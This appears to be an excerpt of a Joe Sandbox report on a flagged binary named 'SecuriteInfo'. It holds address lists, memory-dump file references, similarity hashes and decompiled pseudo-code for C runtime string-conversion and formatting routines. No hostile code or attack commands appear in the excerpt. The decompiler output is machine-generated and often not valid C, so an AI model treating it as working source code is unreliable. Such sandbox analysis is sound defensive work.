    0x00b96bbe
    0x00000000
    0x00000000
    0x00000000
    0x00b96bbe
    0x00000000
    0x00000000
    0x00000000
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00000000
    0x00000000
    0x00b962f9
    0x00b962f9
    0x00b962fc
    0x00b962ff
    0x00000000
    0x00000000
    0x00b96304
    0x00b96307
    0x00b9630d
    0x00000000
    0x00000000
    0x00b962ee
    0x00b962f1
    0x00b962f4
    0x00000000
    0x00000000
    0x00b962e3
    0x00b962e6
    0x00b962e9
    0x00000000
    0x00000000
    0x00b96312
    0x00b96312
    0x00b96315
    0x00b96315
    0x00b96318
    0x00000000
    0x00000000
    0x00b9631b
    0x00000000
    0x00000000
    0x00b9618b
    0x00b9618b
    0x00b9618d
    0x00b9619b
    0x00b9618f
    0x00b9618f
    0x00b9618f
    0x00b961ab
    0x00b961b8
    0x00b961ba
    0x00b961bf
    0x00b961c1
    0x00b961c6
    0x00b961cb
    0x00b961cd
    0x00b961d2
    0x00b961d8
    0x00b961da
    0x00b961da
    0x00b961d8
    0x00b961db
    0x00b961e2
    0x00000000
    0x00b961e4
    0x00b961e9
    0x00b96205
    0x00b9620d
    0x00b9621a
    0x00b9621f
    0x00b97034
    0x00b97041
    0x00b97041
    0x00b961e2
    0x00b96185
    0x00b96f70
    0x00b96f70
    0x00b96f77
    0x00b96f8e
    0x00b96f8e
    0x00b96f98
    0x00b96f98
    0x00b96f9e
    0x00b96fa4
    0x00b96fab
    0x00b96fad
    0x00b96fb2
    0x00b96fb4
    0x00b96fb9
    0x00b96fbe
    0x00b96fc0
    0x00b96fc5
    0x00b96fc8
    0x00b96fcb
    0x00b96fcd
    0x00b96fcd
    0x00b96fcb
    0x00b96fce
    0x00b96fd5
    0x00b97020
    0x00b97029
    0x00b9702e
    0x00b96fd7
    0x00b96fdc
    0x00b96ff8
    0x00b97000
    0x00b9700d
    0x00b97012
    0x00b97012
    0x00000000
    0x00b96fd5
    0x00b96f79
    0x00b96f79
    0x00b96f80
    0x00000000
    0x00000000
    0x00b96f82
    0x00b96f82
    0x00000000
    0x00b96f82
    0x00b96d70
    0x00b96d47
    0x00b96d47
    0x00b96d4b
    0x00b96d58
    0x00b96d5b
    0x00b96d5e
    0x00b96d61
    0x00b96d64
    0x00b96d67
    0x00b96d6a
    0x00b96d6a
    0x00b96d6d
    0x00000000
    0x00b96d6d
    0x00b96d4d
    0x00b96d4d
    0x00b96d50
    0x00b96d53
    0x00b96d56
    0x00000000
    0x00000000
    0x00000000
    0x00b96d56
    0x00b96cac
    0x00b96cac
    0x00b96caf
    0x00b96cb2
    0x00b96cb9
    0x00b96cc0
    0x00b96cc8
    0x00b96cce
    0x00b96cd1
    0x00b96cd4
    0x00b96cdb
    0x00b96ce7
    0x00b96ced
    0x00b96cf3
    0x00b96cfa
    0x00b96cfc
    0x00b96d02
    0x00b96d02
    0x00b96d08
    0x00b96d08
    0x00b96d0e
    0x00b96d17
    0x00b96d1c
    0x00b96d1f
    0x00b96c8e
    0x00b96c8e
    0x00b96c94
    0x00b96c97
    0x00b96c9a
    0x00b96c9c
    0x00000000
    0x00000000
    0x00000000
    0x00b96c9c
    0x00b96c8e
    0x00b96bcb
    0x00b96bcb
    0x00b96bd2
    0x00000000
    0x00000000
    0x00000000
    0x00b96c00
    0x00b96c00
    0x00b96c06
    0x00b96c0c
    0x00b96c12
    0x00000000
    0x00b96c12
    0x00b96ae2
    0x00b96a93

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: __aulldiv__aullrem_get_int64_arg
    • String ID: '$9
    • API String ID: 3120068967-1823400153
    • Opcode ID: 71b28335d6c6224dbe09ff061b8d45077340171bd07b44b5702c8088a0f630c3
    • Instruction ID: f4937d24e8d6f1c99440839bfabfa09c960edda3ec765d240b60193844dff037
    • Opcode Fuzzy Hash: 71b28335d6c6224dbe09ff061b8d45077340171bd07b44b5702c8088a0f630c3
    • Instruction Fuzzy Hash: DE41D1B1E106299FDF24CF58C881BAEB7B5FF85314F1040E8E189AB241D7349A84CF59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 55%
    			E00B92CB3(void* __edi) {
    				signed int _t74;
    				intOrPtr _t75;
    				void* _t80;
    				signed int _t84;
    				void* _t92;
    				void* _t97;
    				signed int _t106;
    				signed int _t108;
    				signed int _t112;
    				signed int _t113;
    				intOrPtr _t114;
    				signed int _t117;
    				signed int _t119;
    				signed int _t125;
    				void* _t127;
    				void* _t128;
    				void* _t129;
    				void* _t131;
    				void* _t132;
    				void* _t140;
    
    				_t127 = __edi;
    				_t113 =  *(_t129 + 0xc);
    				 *_t113 = 0;
    				if( *(_t129 + 0x10) != 0xffffffff &&  *(_t129 + 0x10) != 0x7fffffff &&  *(_t129 + 0x10) > 1) {
    					_t140 =  *0xd11328 -  *(_t129 + 0x10) - 1; // 0xffffffff
    					if(_t140 >= 0) {
    						_t113 =  *(_t129 + 0x10) - 1;
    						__eflags = _t113;
    						 *(_t129 - 0x20) = _t113;
    					} else {
    						_t112 =  *0xd11328; // 0xffffffff
    						 *(_t129 - 0x20) = _t112;
    					}
    					E00B81BB0(_t127,  *(_t129 + 0xc) + 1, 0xfe,  *(_t129 - 0x20));
    					_t131 = _t131 + 0xc;
    				}
    				if( *(_t129 + 8) != 0) {
    					_t113 =  *(_t129 + 8);
    					 *_t113 = 0;
    				}
    				if( *(_t129 + 0x18) <=  *(_t129 + 0x10)) {
    					_t113 =  *(_t129 + 0x18);
    					 *(_t129 - 0x24) = _t113;
    				} else {
    					 *(_t129 - 0x24) =  *(_t129 + 0x10);
    				}
    				 *(_t129 - 8) =  *(_t129 - 0x24);
    				asm("sbb edx, edx");
    				_t114 = _t113 + 1;
    				 *((intOrPtr*)(_t129 - 0x14)) = _t114;
    				if(_t114 == 0) {
    					_push(L"bufferSize <= INT_MAX");
    					_push(0);
    					_push(0x13f);
    					_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c");
    					_push(2);
    					_t92 = L00B7D760();
    					_t131 = _t131 + 0x14;
    					if(_t92 == 1) {
    						asm("int3");
    					}
    				}
    				if( *((intOrPtr*)(_t129 - 0x14)) != 0) {
    					_t100 =  *(_t129 + 0xc);
    					_t74 = L00B92720( *(_t129 + 0xc),  *((intOrPtr*)(_t129 + 0x14)),  *(_t129 - 8),  *((intOrPtr*)(_t129 + 0x1c)));
    					_t132 = _t131 + 0x10;
    					 *(_t129 - 0xc) = _t74;
    					__eflags =  *(_t129 - 0xc) - 0xffffffff;
    					if( *(_t129 - 0xc) != 0xffffffff) {
    						_t117 =  *(_t129 - 0xc) + 1;
    						 *(_t129 - 0xc) = _t117;
    						__eflags =  *(_t129 + 0xc);
    						if( *(_t129 + 0xc) == 0) {
    							L45:
    							__eflags =  *(_t129 + 8);
    							if( *(_t129 + 8) != 0) {
    								 *( *(_t129 + 8)) =  *(_t129 - 0xc);
    							}
    							_t75 =  *((intOrPtr*)(_t129 - 4));
    							goto L48;
    						}
    						__eflags =  *(_t129 - 0xc) -  *(_t129 + 0x10);
    						if( *(_t129 - 0xc) <=  *(_t129 + 0x10)) {
    							L44:
    							_t119 =  *(_t129 + 0xc) +  *(_t129 - 0xc);
    							__eflags = _t119;
    							 *((char*)(_t119 - 1)) = 0;
    							goto L45;
    						}
    						__eflags =  *(_t129 + 0x18) - 0xffffffff;
    						if( *(_t129 + 0x18) == 0xffffffff) {
    							L43:
    							 *(_t129 - 0xc) =  *(_t129 + 0x10);
    							 *((intOrPtr*)(_t129 - 4)) = 0x50;
    							goto L44;
    						}
    						 *( *(_t129 + 0xc)) = 0;
    						__eflags =  *(_t129 + 0x10) - 0xffffffff;
    						if( *(_t129 + 0x10) != 0xffffffff) {
    							__eflags =  *(_t129 + 0x10) - 0x7fffffff;
    							if( *(_t129 + 0x10) != 0x7fffffff) {
    								__eflags =  *(_t129 + 0x10) - 1;
    								if( *(_t129 + 0x10) > 1) {
    									__eflags =  *0xd11328 -  *(_t129 + 0x10) - 1; // 0xffffffff
    									if(__eflags >= 0) {
    										_t106 =  *(_t129 + 0x10) - 1;
    										__eflags = _t106;
    										 *(_t129 - 0x2c) = _t106;
    									} else {
    										_t84 =  *0xd11328; // 0xffffffff
    										 *(_t129 - 0x2c) = _t84;
    									}
    									_t117 =  *(_t129 - 0x2c);
    									__eflags =  *(_t129 + 0xc) + 1;
    									E00B81BB0(_t127,  *(_t129 + 0xc) + 1, 0xfe, _t117);
    									_t132 = _t132 + 0xc;
    								}
    							}
    						}
    						_t104 =  *(_t129 + 0x10);
    						__eflags =  *(_t129 - 0xc) -  *(_t129 + 0x10);
    						asm("sbb edx, edx");
    						 *(_t129 - 0x18) =  ~_t117;
    						if( *(_t129 - 0xc) ==  *(_t129 + 0x10)) {
    							_push(L"sizeInBytes > retsize");
    							_push(0);
    							_push(0x157);
    							_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c");
    							_push(2);
    							_t80 = L00B7D760();
    							_t132 = _t132 + 0x14;
    							__eflags = _t80 - 1;
    							if(_t80 == 1) {
    								asm("int3");
    							}
    						}
    						__eflags =  *(_t129 - 0x18);
    						if( *(_t129 - 0x18) != 0) {
    							goto L43;
    						} else {
    							 *((intOrPtr*)(L00B80C60(_t104))) = 0x22;
    							E00B809F0(_t97, _t104, _t127, _t128, L"sizeInBytes > retsize", L"_wcstombs_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c", 0x157, 0);
    							_t75 = 0x22;
    							goto L48;
    						}
    					} else {
    						__eflags =  *(_t129 + 0xc);
    						if( *(_t129 + 0xc) != 0) {
    							 *( *(_t129 + 0xc)) = 0;
    							__eflags =  *(_t129 + 0x10) - 0xffffffff;
    							if( *(_t129 + 0x10) != 0xffffffff) {
    								__eflags =  *(_t129 + 0x10) - 0x7fffffff;
    								if( *(_t129 + 0x10) != 0x7fffffff) {
    									__eflags =  *(_t129 + 0x10) - 1;
    									if( *(_t129 + 0x10) > 1) {
    										__eflags =  *0xd11328 -  *(_t129 + 0x10) - 1; // 0xffffffff
    										if(__eflags >= 0) {
    											_t125 =  *(_t129 + 0x10) - 1;
    											__eflags = _t125;
    											 *(_t129 - 0x28) = _t125;
    										} else {
    											_t108 =  *0xd11328; // 0xffffffff
    											 *(_t129 - 0x28) = _t108;
    										}
    										_t100 =  *(_t129 + 0xc) + 1;
    										__eflags =  *(_t129 + 0xc) + 1;
    										E00B81BB0(_t127,  *(_t129 + 0xc) + 1, 0xfe,  *(_t129 - 0x28));
    									}
    								}
    							}
    						}
    						_t75 =  *((intOrPtr*)(L00B80C60(_t100)));
    						L48:
    						return _t75;
    					}
    				}
    				 *((intOrPtr*)(L00B80C60(0x7fffffff))) = 0x16;
    				E00B809F0(_t97, 0x7fffffff, _t127, _t128, L"bufferSize <= INT_MAX", L"_wcstombs_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c", 0x13f, 0);
    				_t75 = 0x16;
    				goto L48;
    			}























    0x00b92cb3
    0x00b92cb3
    0x00b92cb6
    0x00b92cbd
    0x00b92cd4
    0x00b92cda
    0x00b92cea
    0x00b92cea
    0x00b92ced
    0x00b92cdc
    0x00b92cdc
    0x00b92ce2
    0x00b92ce2
    0x00b92d00
    0x00b92d05
    0x00b92d05
    0x00b92d0c
    0x00b92d0e
    0x00b92d11
    0x00b92d11
    0x00b92d1d
    0x00b92d27
    0x00b92d2a
    0x00b92d1f
    0x00b92d22
    0x00b92d22
    0x00b92d30
    0x00b92d3b
    0x00b92d3d
    0x00b92d40
    0x00b92d43
    0x00b92d45
    0x00b92d4a
    0x00b92d4c
    0x00b92d51
    0x00b92d56
    0x00b92d58
    0x00b92d5d
    0x00b92d63
    0x00b92d65
    0x00b92d65
    0x00b92d63
    0x00b92d6a
    0x00b92dab
    0x00b92daf
    0x00b92db4
    0x00b92db7
    0x00b92dba
    0x00b92dbe
    0x00b92e2a
    0x00b92e2d
    0x00b92e30
    0x00b92e34
    0x00b92f21
    0x00b92f21
    0x00b92f25
    0x00b92f2d
    0x00b92f2d
    0x00b92f2f
    0x00000000
    0x00b92f2f
    0x00b92e3d
    0x00b92e40
    0x00b92f17
    0x00b92f1a
    0x00b92f1a
    0x00b92f1d
    0x00000000
    0x00b92f1d
    0x00b92e46
    0x00b92e4a
    0x00b92f0a
    0x00b92f0d
    0x00b92f10
    0x00000000
    0x00b92f10
    0x00b92e53
    0x00b92e56
    0x00b92e5a
    0x00b92e5c
    0x00b92e63
    0x00b92e65
    0x00b92e69
    0x00b92e71
    0x00b92e77
    0x00b92e86
    0x00b92e86
    0x00b92e89
    0x00b92e79
    0x00b92e79
    0x00b92e7e
    0x00b92e7e
    0x00b92e8c
    0x00b92e98
    0x00b92e9c
    0x00b92ea1
    0x00b92ea1
    0x00b92e69
    0x00b92e63
    0x00b92ea4
    0x00b92ea7
    0x00b92eaa
    0x00b92eae
    0x00b92eb1
    0x00b92eb3
    0x00b92eb8
    0x00b92eba
    0x00b92ebf
    0x00b92ec4
    0x00b92ec6
    0x00b92ecb
    0x00b92ece
    0x00b92ed1
    0x00b92ed3
    0x00b92ed3
    0x00b92ed1
    0x00b92ed4
    0x00b92ed8
    0x00000000
    0x00b92eda
    0x00b92edf
    0x00b92efb
    0x00b92f03
    0x00000000
    0x00b92f03
    0x00b92dc0
    0x00b92dc0
    0x00b92dc4
    0x00b92dc9
    0x00b92dcc
    0x00b92dd0
    0x00b92dd2
    0x00b92dd9
    0x00b92ddb
    0x00b92ddf
    0x00b92de7
    0x00b92ded
    0x00b92dfd
    0x00b92dfd
    0x00b92e00
    0x00b92def
    0x00b92def
    0x00b92df5
    0x00b92df5
    0x00b92e0f
    0x00b92e0f
    0x00b92e13
    0x00b92e18
    0x00b92ddf
    0x00b92dd9
    0x00b92dd0
    0x00b92e20
    0x00b92f32
    0x00b92f35
    0x00b92f35
    0x00b92dbe
    0x00b92d71
    0x00b92d8d
    0x00b92d95
    0x00000000

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: __invalid_parameter_memset
    • String ID: _wcstombs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c
    • API String ID: 3961059608-322421350
    • Opcode ID: fad81eb4077eeee88aabca004477739ebae87eb65c446136c9536e0249af9fd3
    • Instruction ID: 6aeaea46d8dacf055bb316d5b0b3061b536eb51681a7381603e24eb88ae073d1
    • Opcode Fuzzy Hash: fad81eb4077eeee88aabca004477739ebae87eb65c446136c9536e0249af9fd3
    • Instruction Fuzzy Hash: 45216930E40349ABDF24DF58C841BAE77E0FF45714F2082B9F8256A2A1D7719A50CB91
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E00B96A76() {
    				signed int _t483;
    				void* _t488;
    				signed int _t490;
    				void* _t498;
    				intOrPtr _t501;
    				signed int _t519;
    				intOrPtr _t523;
    				intOrPtr _t524;
    				signed int _t525;
    				void* _t527;
    
    				L0:
    				while(1) {
    					L0:
    					 *(_t525 - 0x30) = 8;
    					while(1) {
    						L143:
    						 *(__ebp - 0x460) = 7;
    						while(1) {
    							L145:
    							 *(__ebp - 8) = 0x10;
    							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    							__eflags =  *(__ebp - 0x10) & 0x00000080;
    							if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    								__edx = 0x30;
    								 *(__ebp - 0x14) = __dx;
    								 *(__ebp - 0x460) =  *(__ebp - 0x460) + 0x51;
    								__eflags =  *(__ebp - 0x460) + 0x51;
    								 *(__ebp - 0x12) = __ax;
    								 *(__ebp - 0x1c) = 2;
    							}
    							while(1) {
    								L150:
    								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    								__eflags =  *(__ebp - 0x10) & 0x00008000;
    								if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    									__eflags =  *(__ebp - 0x10) & 0x00001000;
    									if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    										__eflags =  *(__ebp - 0x10) & 0x00000020;
    										if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    											__eflags =  *(__ebp - 0x10) & 0x00000040;
    											if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    												__ecx = __ebp + 0x14;
    												__eax = E00B93D50(__ebp + 0x14);
    												__edx = 0;
    												__eflags = 0;
    												 *(__ebp - 0x4a0) = __eax;
    												 *(__ebp - 0x49c) = 0;
    											} else {
    												__eax = __ebp + 0x14;
    												__eax = E00B93D50(__ebp + 0x14);
    												asm("cdq");
    												 *(__ebp - 0x4a0) = __eax;
    												 *(__ebp - 0x49c) = __edx;
    											}
    										} else {
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    											__eflags =  *(__ebp - 0x10) & 0x00000040;
    											if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    												__ecx = __ebp + 0x14;
    												E00B93D50(__ebp + 0x14) = __ax & 0x0000ffff;
    												asm("cdq");
    												 *(__ebp - 0x4a0) = __ax & 0x0000ffff;
    												 *(__ebp - 0x49c) = __edx;
    											} else {
    												__eax = __ebp + 0x14;
    												__eax = E00B93D50(__ebp + 0x14);
    												__ax = __eax;
    												asm("cdq");
    												 *(__ebp - 0x4a0) = __eax;
    												 *(__ebp - 0x49c) = __edx;
    											}
    										}
    									} else {
    										__eax = __ebp + 0x14;
    										 *(__ebp - 0x4a0) = E00B93D70(__ebp + 0x14);
    										 *(__ebp - 0x49c) = __edx;
    									}
    								} else {
    									__ecx = __ebp + 0x14;
    									 *(__ebp - 0x4a0) = E00B93D70(__ebp + 0x14);
    									 *(__ebp - 0x49c) = __edx;
    								}
    								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    								__eflags =  *(__ebp - 0x10) & 0x00000040;
    								if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    									goto L167;
    								}
    								L163:
    								__eflags =  *(__ebp - 0x49c);
    								if(__eflags > 0) {
    									goto L167;
    								}
    								L164:
    								if(__eflags < 0) {
    									L166:
    									 *(__ebp - 0x4a0) =  ~( *(__ebp - 0x4a0));
    									__edx =  *(__ebp - 0x49c);
    									asm("adc edx, 0x0");
    									__edx =  ~( *(__ebp - 0x49c));
    									 *(__ebp - 0x4a8) =  ~( *(__ebp - 0x4a0));
    									 *(__ebp - 0x4a4) =  ~( *(__ebp - 0x49c));
    									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    									L168:
    									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    									__eflags =  *(__ebp - 0x10) & 0x00008000;
    									if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    										__eflags =  *(__ebp - 0x10) & 0x00001000;
    										if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    											__edx =  *(__ebp - 0x4a8);
    											__eax =  *(__ebp - 0x4a4);
    											__eax =  *(__ebp - 0x4a4) & 0x00000000;
    											__eflags = __eax;
    											 *(__ebp - 0x4a4) = __eax;
    										}
    									}
    									__eflags =  *(__ebp - 0x30);
    									if( *(__ebp - 0x30) >= 0) {
    										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
    										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
    										__eflags =  *(__ebp - 0x30) - 0x200;
    										if( *(__ebp - 0x30) > 0x200) {
    											 *(__ebp - 0x30) = 0x200;
    										}
    									} else {
    										 *(__ebp - 0x30) = 1;
    									}
    									 *(__ebp - 0x4a8) =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
    									__eflags =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
    									if(( *(__ebp - 0x4a8) |  *(__ebp - 0x4a4)) == 0) {
    										 *(__ebp - 0x1c) = 0;
    									}
    									__eax = __ebp - 0x249;
    									 *(__ebp - 4) = __ebp - 0x249;
    									while(1) {
    										L178:
    										__ecx =  *(__ebp - 0x30);
    										 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    										 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    										__eflags =  *(__ebp - 0x30);
    										if( *(__ebp - 0x30) > 0) {
    											goto L180;
    										}
    										L179:
    										 *(__ebp - 0x4a8) =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
    										__eflags =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
    										if(( *(__ebp - 0x4a8) |  *(__ebp - 0x4a4)) == 0) {
    											L183:
    											__ebp - 0x249 = __ebp - 0x249 -  *(__ebp - 4);
    											 *(__ebp - 0x24) = __ebp - 0x249 -  *(__ebp - 4);
    											__ecx =  *(__ebp - 4);
    											__ecx =  *(__ebp - 4) + 1;
    											 *(__ebp - 4) = __ecx;
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
    											__eflags =  *(__ebp - 0x10) & 0x00000200;
    											if(( *(__ebp - 0x10) & 0x00000200) == 0) {
    												while(1) {
    													L187:
    													__eflags =  *(__ebp - 0x28);
    													if( *(__ebp - 0x28) != 0) {
    														goto L212;
    													}
    													L188:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    													__eflags =  *(__ebp - 0x10) & 0x00000040;
    													if(( *(__ebp - 0x10) & 0x00000040) != 0) {
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000100;
    														__eflags =  *(__ebp - 0x10) & 0x00000100;
    														if(( *(__ebp - 0x10) & 0x00000100) == 0) {
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000001;
    															__eflags =  *(__ebp - 0x10) & 0x00000001;
    															if(( *(__ebp - 0x10) & 0x00000001) == 0) {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000002;
    																__eflags =  *(__ebp - 0x10) & 0x00000002;
    																if(( *(__ebp - 0x10) & 0x00000002) != 0) {
    																	__edx = 0x20;
    																	 *(__ebp - 0x14) = __dx;
    																	 *(__ebp - 0x1c) = 1;
    																}
    															} else {
    																__eax = 0x2b;
    																 *(__ebp - 0x14) = __ax;
    																 *(__ebp - 0x1c) = 1;
    															}
    														} else {
    															__ecx = 0x2d;
    															 *(__ebp - 0x14) = __cx;
    															 *(__ebp - 0x1c) = 1;
    														}
    													}
    													 *(__ebp - 0x18) =  *(__ebp - 0x18) -  *(__ebp - 0x24);
    													__eax =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
    													 *(__ebp - 0x4ac) =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x0000000c;
    													__eflags =  *(__ebp - 0x10) & 0x0000000c;
    													if(( *(__ebp - 0x10) & 0x0000000c) == 0) {
    														__edx = __ebp - 0x44c;
    														__eax =  *(__ebp + 8);
    														__ecx =  *(__ebp - 0x4ac);
    														__eax = E00B971B0(0x20,  *(__ebp - 0x4ac),  *(__ebp + 8), __ebp - 0x44c);
    													}
    													__edx = __ebp - 0x44c;
    													__eax =  *(__ebp + 8);
    													__ecx =  *(__ebp - 0x1c);
    													__edx = __ebp - 0x14;
    													E00B971F0( *(__ebp - 0x1c), __ebp - 0x14,  *(__ebp - 0x1c),  *(__ebp + 8), __ebp - 0x44c) =  *(__ebp - 0x10);
    													__eax =  *(__ebp - 0x10) & 0x00000008;
    													__eflags =  *(__ebp - 0x10) & 0x00000008;
    													if(( *(__ebp - 0x10) & 0x00000008) != 0) {
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
    														__eflags =  *(__ebp - 0x10) & 0x00000004;
    														if(( *(__ebp - 0x10) & 0x00000004) == 0) {
    															__edx = __ebp - 0x44c;
    															__eax =  *(__ebp + 8);
    															__ecx =  *(__ebp - 0x4ac);
    															__eax = E00B971B0(0x30,  *(__ebp - 0x4ac),  *(__ebp + 8), __ebp - 0x44c);
    														}
    													}
    													__eflags =  *(__ebp - 0xc);
    													if( *(__ebp - 0xc) != 0) {
    														L208:
    														__edx = __ebp - 0x44c;
    														__eax =  *(__ebp + 8);
    														__ecx =  *(__ebp - 0x24);
    														__edx =  *(__ebp - 4);
    														__eax = E00B971F0(__ecx,  *(__ebp - 4), __ecx,  *(__ebp + 8), __ebp - 0x44c);
    														goto L209;
    													} else {
    														L201:
    														__eflags =  *(__ebp - 0x24);
    														if( *(__ebp - 0x24) <= 0) {
    															goto L208;
    														}
    														L202:
    														__edx =  *(__ebp - 4);
    														 *(__ebp - 0x4b0) =  *(__ebp - 4);
    														__eax =  *(__ebp - 0x24);
    														 *(__ebp - 0x4b4) =  *(__ebp - 0x24);
    														while(1) {
    															L203:
    															__ecx =  *(__ebp - 0x4b4);
    															 *(__ebp - 0x4b4) =  *(__ebp - 0x4b4) - 1;
    															 *(__ebp - 0x4b4) =  *(__ebp - 0x4b4) - 1;
    															__eflags = __ecx;
    															if(__ecx <= 0) {
    																break;
    															}
    															L204:
    															__ecx = __ebp - 0x40;
    															__eax = E00B7C680(__ebp - 0x40);
    															__ecx = __ebp - 0x40;
    															E00B7C680(__ebp - 0x40) =  *__eax;
    															__ecx =  *(__ebp - 0x458 + 0xac);
    															__edx =  *(__ebp - 0x4b0);
    															__eax = __ebp - 0x458;
    															 *(__ebp - 0x4b8) = E00B90E50(__ebp - 0x458,  *(__ebp - 0x4b0),  *(__ebp - 0x458 + 0xac), __ebp - 0x458);
    															__eflags =  *(__ebp - 0x4b8);
    															if( *(__ebp - 0x4b8) > 0) {
    																L206:
    																__ecx = __ebp - 0x44c;
    																__edx =  *(__ebp + 8);
    																 *(__ebp - 0x458) & 0x0000ffff = E00B97150( *(__ebp - 0x458) & 0x0000ffff,  *(__ebp + 8), __ebp - 0x44c);
    																 *(__ebp - 0x4b0) =  *(__ebp - 0x4b0) +  *(__ebp - 0x4b8);
    																 *(__ebp - 0x4b0) =  *(__ebp - 0x4b0) +  *(__ebp - 0x4b8);
    																continue;
    															}
    															L205:
    															 *(__ebp - 0x44c) = 0xffffffff;
    															break;
    														}
    														L207:
    														L209:
    														__eflags =  *(__ebp - 0x44c);
    														if( *(__ebp - 0x44c) >= 0) {
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
    															__eflags =  *(__ebp - 0x10) & 0x00000004;
    															if(( *(__ebp - 0x10) & 0x00000004) != 0) {
    																__ecx = __ebp - 0x44c;
    																__edx =  *(__ebp + 8);
    																 *(__ebp - 0x4ac) = E00B971B0(0x20,  *(__ebp - 0x4ac),  *(__ebp + 8), __ebp - 0x44c);
    															}
    														}
    													}
    													L212:
    													__eflags =  *(__ebp - 0x20);
    													if( *(__ebp - 0x20) != 0) {
    														__ecx =  *(__ebp - 0x20);
    														__eax = L00B7EB20( *(__ebp - 0x20), 2);
    														 *(__ebp - 0x20) = 0;
    													}
    													while(1) {
    														L214:
    														 *(_t525 - 0x454) =  *((intOrPtr*)( *((intOrPtr*)(_t525 + 0xc))));
    														_t502 =  *(_t525 - 0x454) & 0x0000ffff;
    														 *((intOrPtr*)(_t525 + 0xc)) =  *((intOrPtr*)(_t525 + 0xc)) + 2;
    														if(( *(_t525 - 0x454) & 0x0000ffff) == 0 ||  *(_t525 - 0x44c) < 0) {
    															break;
    														} else {
    															if(( *(_t525 - 0x454) & 0x0000ffff) < 0x20 || ( *(_t525 - 0x454) & 0x0000ffff) > 0x78) {
    																 *(_t525 - 0x4d8) = 0;
    															} else {
    																 *(_t525 - 0x4d8) =  *(( *(_t525 - 0x454) & 0x0000ffff) +  &M00B77B58) & 0xf;
    															}
    														}
    														L7:
    														 *(_t525 - 0x450) =  *(_t525 - 0x4d8);
    														_t519 =  *(_t525 - 0x450) * 9;
    														_t490 =  *(_t525 - 0x45c);
    														_t510 = ( *(_t519 + _t490 + 0xb77b78) & 0x000000ff) >> 4;
    														 *(_t525 - 0x45c) = ( *(_t519 + _t490 + 0xb77b78) & 0x000000ff) >> 4;
    														if( *(_t525 - 0x45c) != 8) {
    															L16:
    															 *(_t525 - 0x4e0) =  *(_t525 - 0x45c);
    															__eflags =  *(_t525 - 0x4e0) - 7;
